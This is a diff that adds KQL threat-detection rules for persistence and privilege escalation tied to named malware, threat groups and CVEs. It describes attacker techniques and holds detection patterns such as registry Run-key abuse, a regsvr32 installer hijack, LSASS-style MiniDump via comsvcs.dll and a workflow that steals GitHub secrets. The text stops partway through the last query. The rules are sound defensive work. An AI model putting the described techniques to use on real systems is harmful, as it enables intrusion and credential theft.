new file mode 100644 index 00000000..9b762bed --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql @@ -0,0 +1,12 @@ +// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-03-22 +// Level: medium +// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. +This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql new file mode 100644 index 00000000..7ed90560 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql @@ -0,0 +1,10 @@ +// Title: Potential NetWire RAT Activity - Registry +// Author: Christopher Peacock +// Date: 2021-10-07 +// Level: high +// Description: Detects registry keys related to NetWire RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\software\\NetWire" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql new file mode 100644 index 00000000..bd5277d2 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql @@ -0,0 +1,13 @@ +// Title: Potential Notepad++ CVE-2025-49144 Exploitation +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-26 +// Level: high +// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path. +This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. +The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql new file mode 100644 index 00000000..127ba1e2 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential PrintNightmare Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-07-01 +// Level: high +// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql new file mode 100644 index 00000000..b130f579 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql @@ -0,0 +1,12 @@ +// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-31 +// Level: low +// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. +Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats + +DeviceRegistryEvents +| where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql new file mode 100644 index 00000000..17a51abf --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql @@ -0,0 +1,10 @@ +// Title: Potential Ursnif Malware Activity - Registry +// Author: megan201296 +// Date: 2019-02-13 +// Level: high +// Description: Detects registry keys related to Ursnif malware. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql new file mode 100644 index 00000000..e06e18c0 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql @@ -0,0 +1,14 @@ +// Title: ScreenConnect User Database Modification +// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress +// Date: 2024-02-21 +// Level: medium +// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. +This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats +// False Positives: +// - This will occur legitimately as well and will result in some benign activity. + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql new file mode 100644 index 00000000..ff5530e3 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql @@ -0,0 +1,12 @@ +// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-14 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql new file mode 100644 index 00000000..f4b1f212 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql @@ -0,0 +1,12 @@ +// Title: Shai-Hulud Malicious GitHub Workflow Creation +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: high +// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql new file mode 100644 index 00000000..4873205b --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql @@ -0,0 +1,12 @@ +// Title: Small Sieve Malware Registry Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql new file mode 100644 index 00000000..947bc083 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql @@ -0,0 +1,10 @@ +// Title: SNAKE Malware Covert Store Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-11 +// Level: high +// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql new file mode 100644 index 00000000..3332cc7a --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql @@ -0,0 +1,10 @@ +// Title: SOURGUM Actor Behaviours +// Author: MSTIC, FPT.EagleEye +// Date: 2021-06-15 +// Level: high +// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM +// MITRE Tactic: Persistence +// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql new file mode 100644 index 00000000..97a5181a --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql @@ -0,0 +1,12 @@ +// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) +// Author: EagleEye Team, Florian Roth +// Date: 2020-05-13 +// Level: high +// Description: Detects new commands that add new printer port which point to suspicious file +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql new file mode 100644 index 00000000..23849038 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Process Spawned by CentreStack Portal AppPool +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2025-04-17 +// Level: high +// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats +// False Positives: +// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. + +DeviceProcessEvents +| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql new file mode 100644 index 00000000..f8a299e5 --- /dev/null +++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql @@ -0,0 +1,13 @@ +// Title: Windows Spooler Service Suspicious Binary Load +// Author: FPT.EagleEye, Thomas Patzke (improvements) +// Date: 2021-06-29 +// Level: informational +// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Loading of legitimate driver + +DeviceImageLoadEvents +| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql new file mode 100644 index 00000000..f839c135 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql @@ -0,0 +1,12 @@ +// Title: APT27 - Emissary Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2018-09-03 +// Level: critical +// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql new file mode 100644 index 00000000..5b225c54 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql @@ -0,0 +1,12 @@ +// Title: ChromeLoader Malware Execution +// Author: @kostastsale +// Date: 2022-01-10 +// Level: high +// Description: Detects execution of ChromeLoader malware via a registered scheduled task +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql new file mode 100644 index 00000000..4093e401 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql @@ -0,0 +1,14 @@ +// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: medium +// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. +This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788 +// False Positives: +// - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes. + +DeviceProcessEvents +| where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql new file mode 100644 index 00000000..42e82d5a --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql @@ -0,0 +1,10 @@ +// Title: Defrag Deactivation +// Author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +// Date: 2019-03-04 +// Level: medium +// Description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.s0111, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/change") and (ProcessCommandLine contains "/TN" and ProcessCommandLine contains "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql new file mode 100644 index 00000000..1ab20b16 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql @@ -0,0 +1,10 @@ +// Title: Exploiting CVE-2019-1388 +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-20 +// Level: critical +// Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2019-1388, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains " http" and FolderPath endswith "\\iexplore.exe" and InitiatingProcessFolderPath endswith "\\consent.exe") and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql new file mode 100644 index 00000000..b8420249 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql @@ -0,0 +1,14 @@ +// Title: Forest Blizzard APT - Custom Protocol Handler Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of a custom protocol handler with the name "rogue". +Seen being created by Forest Blizzard APT as reported by MSFT. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql new file mode 100644 index 00000000..18a4b420 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql @@ -0,0 +1,14 @@ +// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of the DLL that handles the custom protocol handler. +Seen being created by Forest Blizzard APT as reported by MSFT. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql new file mode 100644 index 00000000..00179650 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql @@ -0,0 +1,12 @@ +// Title: HAFNIUM Exchange Exploitation Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: critical +// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "Temp\\__output") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql new file mode 100644 index 00000000..d91c5c3f --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql @@ -0,0 +1,14 @@ +// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity +// Author: @kostastsale +// Date: 2023-08-07 +// Level: high +// Description: Detects the execution of installed GuLoader malware on the host. +GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql new file mode 100644 index 00000000..8c3c6f0c --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql @@ -0,0 +1,12 @@ +// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats +// False Positives: +// - Possibly some Microsoft Edge upgrades + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql new file mode 100644 index 00000000..725f8d15 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql @@ -0,0 +1,10 @@ +// Title: Kapeka Backdoor Autorun Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents +| where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql new file mode 100644 index 00000000..be69d3b9 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql @@ -0,0 +1,17 @@ +// Title: Kapeka Backdoor Persistence Activity +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects Kapeka backdoor persistence activity. +Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). +For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. +To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. +Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and 